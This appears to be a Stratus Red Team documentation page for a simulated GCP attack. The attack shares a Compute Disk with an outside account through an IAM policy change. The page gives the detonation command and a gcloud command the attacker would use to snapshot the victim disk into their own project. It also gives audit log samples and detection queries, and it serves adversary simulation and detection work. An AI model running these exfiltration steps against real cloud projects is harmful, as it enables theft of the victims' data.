Skip to content

Exfiltrate Compute Disk by sharing it

idempotent

Platform: GCP

MITRE ATT&CK Tactics

  • Exfiltration

Description

Exfiltrates a Compute Disk by sharing with a fictitious attacker account. The attacker could then create a snapshot of the disk in their GCP project.

Warm-up:

  • Create a Compute Disk

Detonation:

  • Set the IAM policy of the disk so that the attacker account has permissions to read the disk in their own project

Note

Since the target e-mail must exist for this attack simulation to work, Stratus Red Team grants the role to stratusredteam@gmail.com by default. This is a real Google account, owned by Stratus Red Team maintainers and that is not used for any other purpose than this attack simulation. However, you can override this behavior by setting the environment variable STRATUS_RED_TEAM_ATTACKER_EMAIL, for instance:

export STRATUS_RED_TEAM_ATTACKER_EMAIL="your-own-gmail-account@gmail.com"
stratus detonate gcp.exfiltration.share-compute-disk

Instructions

Detonate with Stratus Red Team
stratus detonate gcp.exfiltration.share-compute-disk

Detection

You can detect when someone changes the IAM policy of a Compute Disk, using the GCP Admin Activity audit logs event v1.compute.disks.setIamPolicy. Here's a sample event, shortened for clarity:

{
  "protoPayload": {
    "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
    "authenticationInfo": {
      "principalEmail": "user-sharing-the-disk@domain.tld",
      "principalSubject": "user:user-sharing-the-disk@domain.tld"
    },
    "requestMetadata": {
      "callerIp": "34.33.32.31",
      "callerSuppliedUserAgent": "google-cloud-sdk gcloud/..."
    },
    "resourceName": "projects/victim-project/zones/us-central1-a/disks/stratus-red-team-victim-disk",
    "request": {
      "policy": {
        "version": "3",
        "bindings": [
          {
            "role": "roles/owner",
            "members": [
              "user:attacker@gmail.com"
            ]
          }
        ]
      },
      "@type": "type.googleapis.com/compute.disks.setIamPolicy"
    }
  }
}

After the attacker has permissions on the Compute Disk, they can create a snapshot of it in their own GCP project using:

gcloud compute snapshots create stolen-snapshot \
    --source-disk https://www.googleapis.com/compute/v1/projects/victim-project/zones/us-central1-a/disks/stratus-red-team-victim-disk

When they do so, a GCP Admin Activity event v1.compute.snapshots.insert is generated in the victim project, indicating that the attacker has not only shared but also actively stolen data from the disk (sample event shortened below):

{
  "protoPayload": {
    "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
    "authenticationInfo": {
      "principalEmail": "attacker@gmail.com",
      "principalSubject": "user:attacker@gmail.com"
    },
    "requestMetadata": {
      "callerSuppliedUserAgent": "google-cloud-sdk gcloud/...",
      // Note: the IP of the attacker is not logged in this event
    },
    "serviceName": "compute.googleapis.com",
    "methodName": "v1.compute.snapshots.insert",
    "resourceName": "projects/victim-project/zones/us-central1-a/disks/stratus-red-team-victim-disk",
    "request": {
      "@type": "type.googleapis.com/compute.snapshots.insert"
    },
    "metadata": {
      "@type": "type.googleapis.com/google.cloud.audit.CrossEntityControlAuditMetadata"
    }
  }
}

Based on these events, detection strategies may include:

  • Alerting when the IAM policy of a Compute Disk is changed, especially if such a sharing mechanism is not part of your normal operations. Sample GCP Logs Explorer query:
protoPayload.methodName="v1.compute.disks.setIamPolicy"
  • Alerting when someone with an unexpected e-mail domain creates a snapshot of a Compute Disk. Sample GCP Logs Explorer query:
protoPayload.methodName="v1.compute.snapshots.insert"
NOT protoPayload.authenticationInfo.principalEmail=~".+@your-domain.tld$"